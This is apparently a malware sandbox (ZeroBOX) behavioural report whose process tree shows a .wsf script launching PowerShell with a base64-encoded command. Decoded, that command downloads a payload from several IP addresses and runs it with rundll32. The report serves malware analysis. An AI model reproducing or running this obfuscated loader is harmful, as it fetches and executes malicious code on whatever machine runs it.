popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\AprilW(uWfJ74197).wsf

    1932

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAaQBuAHQAZQByAHAAbABhAHkAVQBuAHAAdQBsAHYAZQByAGkAegBlACAAPQAgACgAIgBoAHQAdABwADoALwAvADkANAAuADEAMwAxAC4AMQAwADEALgAxADUALwA1ADUANQA1ADUANQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA4ADcALgAyADMANgAuADEANAA2AC4AMgAzADYALwA1ADUANQA1ADUANQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA5ADQALgAxADMAMQAuADEAMQA3AC4ANAA1AC8ANQA1ADUANQA1ADUALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AMgAwADMALgA5ADYALgAxADcANwAuADEAMQAxAC8ANQA1ADUANQA1ADUALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AOQAxAC4AMQA5ADMALgAxADkALgAyADEANwAvADUANQA1ADUANQA1AC4AZABhAHQALABoAHQAdABwADoALwAvADEAOQA0AC4AMQA2ADUALgA1ADkALgA1ADEALwA1ADUANQA1ADUANQAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHUAbgB0AGEAcwB0AGUAZgB1AGwAbAB5ACAAaQBuACAAJABpAG4AdABlAHIAcABsAGEAeQBVAG4AcAB1AGwAdgBlAHIAaQB6AGUAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAHUAbgB0AGEAcwB0AGUAZgB1AGwAbAB5ACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA2ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABoAG8AbQBlAG8AcABhAHQAaABpAGUAcwAuAGEAdQB4AG8AdAByAG8AcABoAHkAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABoAG8AbQBlAG8AcABhAHQAaABpAGUAcwAuAGEAdQB4AG8AdAByAG8AcABoAHkAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAAxADAAMAAwADAAMAApACAAewBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAaABvAG0AZQBvAHAAYQB0AGgAaQBlAHMALgBhAHUAeABvAHQAcgBvAHAAaAB5ACwATgBpAGsAbgA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADUAOwB9AH0A"

      2160

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf